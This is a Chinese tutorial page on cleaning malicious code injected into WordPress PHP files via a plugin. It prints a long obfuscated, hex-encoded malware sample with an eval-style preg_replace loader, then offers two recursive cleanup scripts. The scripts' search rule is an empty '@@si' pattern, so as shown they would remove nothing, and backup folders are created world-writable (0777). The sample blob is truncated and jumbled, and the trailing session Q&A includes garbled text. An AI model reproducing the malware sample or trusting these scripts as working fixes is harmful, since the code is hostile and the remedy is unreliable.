清除wordpress里PHP文件恶意代码 -php教程-PHP中文网

首页

后端开发

php教程

清除wordpress里PHP文件恶意代码

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jul 25, 2016 am 08:46 AM

公司一些wordpress网站由于下载的插件存在恶意代码，导致整个服务器所有网站PHP文件都存在恶意代码，就写了个简单的脚本清除。

!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]621:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#!#]y81]273]y>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#^#zsfvrx5c%x7827&6hmg%x5c%x7825!j%%x5c%x7825:|:**t%x5c%xW~!%x5c%x7825z!>215b:%x5c%x7825s:%x5cw>#]y74]273]y76]252]y85]256]y6g]257]y8!:8:|:7#6ufs!|ftmf!~!#]y81]273]y76]258]y6g]273]#*%x5c%x7824-%x5c%x7824!>!tus%x5x782fq%x5c%x7825>2q%x5c%x7825%x5c%x782f7rfs%x5c%x78256!%x5c%x7824c%x7825c!>!%x5c%x7825i%x5c%x785c2^n%x5c%x7825!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%7825)m%x5c%x7825=*h%x5c%x78254%x5c%x785c%x5c%x7825j^%x527,*e%x5c%x7827,*d%x5c%x7827,*cmfV%x5c%x787fu%x5c%x!*5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7or_reporting(0); preg_replace("%x2f%ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y76]258]y6g]273]y76]271]y7d]25%x5c%x7825hOh%x5c%x782f#00#W~!%x5c%xS["%x61%156%x75%156%x61"]=1; function f:h%x5c%x7825:!2p%x5c2fh%x5c%x7825:%x5c%x7825fdyUm%x5c%x5c%x7825!qp%x5c%x7825!|Z~!!2p%x5c%x7825!|!*!***b%x5#P#-#Q#-#B#-#T#-#E#-#G#-#x787fw6*%x5c%x787f_*#fmjgk4%x5*WCw*[!%x5c%x7825rN}#QwTW%xc%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#50%x2e%52%x29%57%x65","%x65%166%x61%154%x28%151%x6d%160%x6c%25)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%7827pd%x5c%x78256b%x5c%x7825!*##>>X)!gjZb%x5c%x7825!**X)ufttj%x7825c:>11%x5c%x782272qj%x5c%x7825)7gj6!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>x7825!>}R;msv}.;%x5c%x782f#%xc%x78b%x5c%x7825w:!>!%x5c%x78246767~6>%x5c%|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tujQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x78!2p%x5c%x78uft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x7860ufldpt}X;%x5c%x78#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)uftc%x7825tpz!>!#]D6M7]K3#}>!%x5c%x7825tdz)%x5c%x7825ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x782560msvd}R;*msv%x5c%x7825)}.;%x5c%x7860UQP78W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x55c%x787fw6>%x5c%x7822!ftmbg)!gj]58y]472]37y]672]48y]#>s%x5c%x7825q5c%x7825)!gj!2bd%x5c%x7825!2qj%x5c%x78257-K)udfoopdXA%x54!#]y76]277]y72]265]y39]274]y85]273]y66<.4>1?*2b%x5c%x7825)gpf{jt)!gj!:r7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]KC#>2*!%x5c%x7825z>3j%x5c%x7825!*72!%x5c%x7827!hmg%x-t.98]K4]65]D8]86]y31]278]y3f]5c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%x7%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!!#]y84]275]y83]248]y83]256c%x7825V%x5c%x7827{ftmfV%x5c%x787f%x5c%x782f7&%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjud7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x5c%x7825)hopm3qjA)qj3hopmA%x578Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x78782fqp%x5c%x7825>5h%x5c%4-%x5c%x7824y7%x5c%x7824-%>!}W;utpi}Y;tuofuopd%x5c%x7tsbqA7>q%x5c%x78256%x5c%x7897e:56-%x5c%x7878r.985:52985c%x7825kj:-!OVMM*#L4]275L3]248L3P6L1M5]D2P4]D6#>1*!%x5c%x7825b:]y4c#!%x5c%x7824Ypp3)%x5c%x7825cB%x5c%e56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTbek!~!bjepdoF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#cvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*q%x5c%x7825V>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!5)sf%x5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~#]y31]278]y3e]81]K78:569x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWtj%x5c%x7822)gj6!%x5c%x782400~:Ew:Qb:Qc:]37]278]225]241]334]368]322]3]364]6]283]2178}527}88:}334}472%x55c%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f#00;quui#>.5j:>11%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x782x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x782{66~6j%x5c%x7825!*3!%x5c%x7827c%x78256!#]y84]275]y83]273]y76]277#2b%x5c%7825%x5c%x7827Y%x5c%x78256<.msv>EzH,2W%x5c%x7825wN;#-Ez-1H9%164%50%x22%134%x78%62%x35%165%x3a%146%x21%76%x5fdy)##-!#~2%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#

复制代码

/**
* 文件名：delUnwantedCode.php
* 功能：删除FTP里恶意代码
* 使用说明：
* 请将文件上传到需要清除恶意代码的目录，然后通过CLI或浏览器访问即可，原有被感染的文件会自动备份
*/
$path = dirname(__FILE__); #定义需要处理的目录
$bak_path = $path.DIRECTORY_SEPARATOR.basename(__FILE__,'.php'); #定义源文件备份目录，程序过滤恶意代码前，先按原有的路径备份文档到此目录
$fileType = array('php'); #定义需要处理的文件类型（后缀名），小写
$search = array('@@si'); #定义需要过滤的恶意代码规则
$search_count = array(
'all_file'=>array(), #所有文件
'search_file0'=>array(), #没有恶意代码文件
'search_file1'=>array() #含有恶意代码文件
);
$filelist = listDir($path,$fileType,false); #读取目录里符合条件文件列表
if(!empty($filelist)){
foreach ($filelist as $file){
$file = (isset($file['name'])?$file['name']:$file);
$search_count['all_file'][] = $file;
$fileContent = file_get_contents($file);
$compile_fileContent = preg_replace($search, '', $fileContent);
if(strlen($fileContent) != strlen($compile_fileContent) && str_replace($bak_path, '', $file)==$file){
#过滤后文件长度不一致，则表示含有恶意代码（备份文件所在目录不过滤）
$search_count['search_file1'][] = $file;
############备份原有文件开始###############
$bakFile = str_replace($path, $bak_path, $file);
@make_dir(dirname($bakFile));
@file_put_contents($bakFile, $fileContent);
############备份原有文件结束###############
#重新写入过滤后的内容到原有的PHP文件
@file_put_contents($file, $compile_fileContent);
}else{
$search_count['search_file0'][] = $file;
}
}
}
#print_r($search_count);die;
echo sprintf('从%s里共搜索到%s个符合条件的文件，其中%s个存在恶意代码，已处理结束',$path,count($search_count['all_file']), count($search_count['search_file1']));die;
########################
## 辅助函数
########################
/**
* 检查目标文件夹是否存在，如果不存在则自动创建该目录
*
* @access public
* @param string folder 目录路径。不能使用相对于网站根目录的URL
*
* @return bool
*/
function make_dir($folder){
$reval = false;
if (!file_exists($folder)){
#如果目录不存在则尝试创建该目录
@umask(0);
#将目录路径拆分成数组
preg_match_all('/([^\/]*)\/?/i', $folder, $atmp);
#如果第一个字符为/则当作物理路径处理
$base = ($atmp[0][0] == '/') ? '/' : '';
#遍历包含路径信息的数组
foreach ($atmp[1] AS $val){
if ('' != $val){
$base .= $val;
if ('..' == $val || '.' == $val){
#如果目录为.或者..则直接补/继续下一个循环
$base .= '/';
continue;
}
}else{
continue;
}
$base .= '/';
if (!file_exists($base)){
#尝试创建目录，如果创建失败则继续循环
if (@mkdir(rtrim($base, '/'), 0777)){
@chmod($base, 0777);
$reval = true;
}
}
}
}else{
#路径已经存在。返回该路径是不是一个目录
$reval = is_dir($folder);
}
clearstatcache();
return $reval;
}
########获取目录下所有文件，包括子目录开始################
function listDir($path,$fileType=array(),$fileInfo=true){
$path = str_replace(array('/','\\'), DIRECTORY_SEPARATOR, $path);
if(!file_exists($path)||!is_dir($path)){
return '';
}
if(substr($path, -1,1)==DIRECTORY_SEPARATOR){
$path = substr($path, 0,-1);
}
$dirList=array();
$dir=opendir($path);
while($file=readdir($dir)){
#若有定义$fileType，并且文件类型不在$fileType范围内或文件是一个目录，则跳过
if($file!=='.'&&$file!=='..'){
$file = $path.DIRECTORY_SEPARATOR.$file;
if(is_dir($file)){
if(empty($fileType)){
$dirList[] = ($fileInfo==true?array('name'=>$file,'isDir'=>intval(is_dir($file))):$file);
}
$dirList = array_merge($dirList,listDir($file,$fileType));
}elseif(!empty($fileType) && (in_array(pathinfo($file, PATHINFO_EXTENSION), $fileType))){
$dirList[] = ($fileInfo==true?array('name'=>$file,'isDir'=>intval(is_dir($file)),'md5_file'=>md5_file($file),'filesize'=>filesize($file),'filemtime'=>filemtime($file)):$file);
}
};
};
closedir($dir);
return $dirList;
}
########获取目录下所有文件，包括子目录结束################

复制代码

/**
* 文件名：delAllUnwantedCode.php
* 功能：删除FTP里恶意代码(支持任意数量的文件处理)
* 使用说明：
* 请将文件上传到需要清除恶意代码的目录，然后通过CLI或浏览器访问即可，原有被感染的文件会自动备份
*/
set_time_limit(0);ignore_user_abort(true);
$path = dirname(__FILE__); #定义需要处理的目录
$bak_path = $path.DIRECTORY_SEPARATOR.basename(__FILE__,'.php'); #定义源文件备份目录，程序过滤恶意代码前，先按原有的路径备份文档到此目录
$fileType = array('php'); #定义需要处理的文件类型（后缀名），小写
$search = array('@@si'); #定义需要过滤的恶意代码规则
$file_count = array(
'all_file'=>0, #所有文件
'filter_file'=>0 #含有恶意代码文件
);
replaceUnwantedCode($path); #执行过滤
#print_r($search_count);die;
echo sprintf('从%s里共搜索到%s个符合条件的文件，其中%s个存在恶意代码已清理，原始文件保存在%s',$path, ($file_count['all_file']), ($file_count['filter_file']), $bak_path);die;
function replaceUnwantedCode($path){
global $bak_path,$fileType,$search,$file_count;
$path = str_replace(array('/','\\'), DIRECTORY_SEPARATOR, $path);
if(!file_exists($path)||!is_dir($path)){
return '';
}
if(substr($path, -1,1)==DIRECTORY_SEPARATOR){
$path = substr($path, 0,-1);
}
$dir=opendir($path);
while($file=readdir($dir)){
#若有定义$fileType，并且文件类型不在$fileType范围内或文件是一个目录，则跳过
if($file!=='.'&&$file!=='..'){
$file = $path.DIRECTORY_SEPARATOR.$file;
if(is_dir($file)){
replaceUnwantedCode($file);
}elseif(!empty($fileType) && (in_array(pathinfo($file, PATHINFO_EXTENSION), $fileType))){
################################
@$file_count['all_file']++;
$fileContent = file_get_contents($file); #文件原始代码
$compile_fileContent = preg_replace($search, '', $fileContent); #过滤后的内容
if(strlen($fileContent) != strlen($compile_fileContent) && str_replace($bak_path, '', $file)==$file){
#过滤后文件长度不一致，则表示含有恶意代码（备份文件所在目录不过滤）
$file_count['filter_file']++;
############备份原有文件开始###############
$bakFile = str_replace($path, $bak_path, $file);
@make_dir(dirname($bakFile));
@file_put_contents($bakFile, $fileContent);
############备份原有文件结束###############
#重新写入过滤后的内容到原有的PHP文件
@file_put_contents($file, $compile_fileContent);
}
################################
unset($fileContent,$compile_fileContent);
}
};
};
closedir($dir);
return true;
}
########################
## 辅助函数
########################
/**
* 检查目标文件夹是否存在，如果不存在则自动创建该目录
*
* @access public
* @param string folder 目录路径。不能使用相对于网站根目录的URL
*
* @return bool
*/
function make_dir($folder){
$reval = false;
if (!file_exists($folder)){
#如果目录不存在则尝试创建该目录
@umask(0);
#将目录路径拆分成数组
preg_match_all('/([^\/]*)\/?/i', $folder, $atmp);
#如果第一个字符为/则当作物理路径处理
$base = ($atmp[0][0] == '/') ? '/' : '';
#遍历包含路径信息的数组
foreach ($atmp[1] AS $val){
if ('' != $val){
$base .= $val;
if ('..' == $val || '.' == $val){
#如果目录为.或者..则直接补/继续下一个循环
$base .= '/';
continue;
}
}else{
continue;
}
$base .= '/';
if (!file_exists($base)){
#尝试创建目录，如果创建失败则继续循环
if (@mkdir(rtrim($base, '/'), 0777)){
@chmod($base, 0777);
$reval = true;
}
}
}
}else{
#路径已经存在。返回该路径是不是一个目录
$reval = is_dir($folder);
}
clearstatcache();
return $reval;
}

复制代码

恶意代码, wordpress, PHP

声明

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系admin@php.cn

简单地说明PHP会话的概念。Apr 26, 2025 am 12:09 AM

phpsessionstrackuserdataacrossmultiplepagerequestsusingauniqueIdStoredInacookie.here'showtomanageThemeffectionaly：1）startAsessionWithSessionwwithSession_start（）和stordoredAtain $ _session.2）

您如何循环中存储在PHP会话中的所有值？Apr 26, 2025 am 12:06 AM

在PHP中，遍历会话数据可以通过以下步骤实现：1.使用session_start()启动会话。2.通过foreach循环遍历$_SESSION数组中的所有键值对。3.处理复杂数据结构时，使用is_array()或is_object()函数，并用print_r()输出详细信息。4.优化遍历时，可采用分页处理，避免一次性处理大量数据。这将帮助你在实际项目中更有效地管理和使用PHP会话数据。

说明如何使用会话进行用户身份验证。Apr 26, 2025 am 12:04 AM

会话通过服务器端的状态管理机制实现用户认证。1)会话创建并生成唯一ID，2)ID通过cookies传递，3)服务器存储并通过ID访问会话数据，4)实现用户认证和状态管理，提升应用安全性和用户体验。

举一个如何在PHP会话中存储用户名的示例。Apr 26, 2025 am 12:03 AM

Tostoreauser'snameinaPHPsession,startthesessionwithsession_start(),thenassignthenameto$_SESSION['username'].1)Usesession_start()toinitializethesession.2)Assigntheuser'snameto$_SESSION['username'].Thisallowsyoutoaccessthenameacrossmultiplepages,enhanc

哪些常见问题会导致PHP会话失败？Apr 25, 2025 am 12:16 AM

PHPSession失效的原因包括配置错误、Cookie问题和Session过期。1.配置错误：检查并设置正确的session.save_path。2.Cookie问题：确保Cookie设置正确。3.Session过期：调整session.gc_maxlifetime值以延长会话时间。

您如何在PHP中调试与会话相关的问题？Apr 25, 2025 am 12:12 AM

在PHP中调试会话问题的方法包括：1.检查会话是否正确启动；2.验证会话ID的传递；3.检查会话数据的存储和读取；4.查看服务器配置。通过输出会话ID和数据、查看会话文件内容等方法，可以有效诊断和解决会话相关的问题。

如果session_start（）被多次调用会发生什么？Apr 25, 2025 am 12:06 AM

多次调用session_start()会导致警告信息和可能的数据覆盖。1)PHP会发出警告，提示session已启动。2)可能导致session数据意外覆盖。3)使用session_status()检查session状态，避免重复调用。

您如何在PHP中配置会话寿命？Apr 25, 2025 am 12:05 AM

在PHP中配置会话生命周期可以通过设置session.gc_maxlifetime和session.cookie_lifetime来实现。1)session.gc_maxlifetime控制服务器端会话数据的存活时间，2)session.cookie_lifetime控制客户端cookie的生命周期，设置为0时cookie在浏览器关闭时过期。

See all articles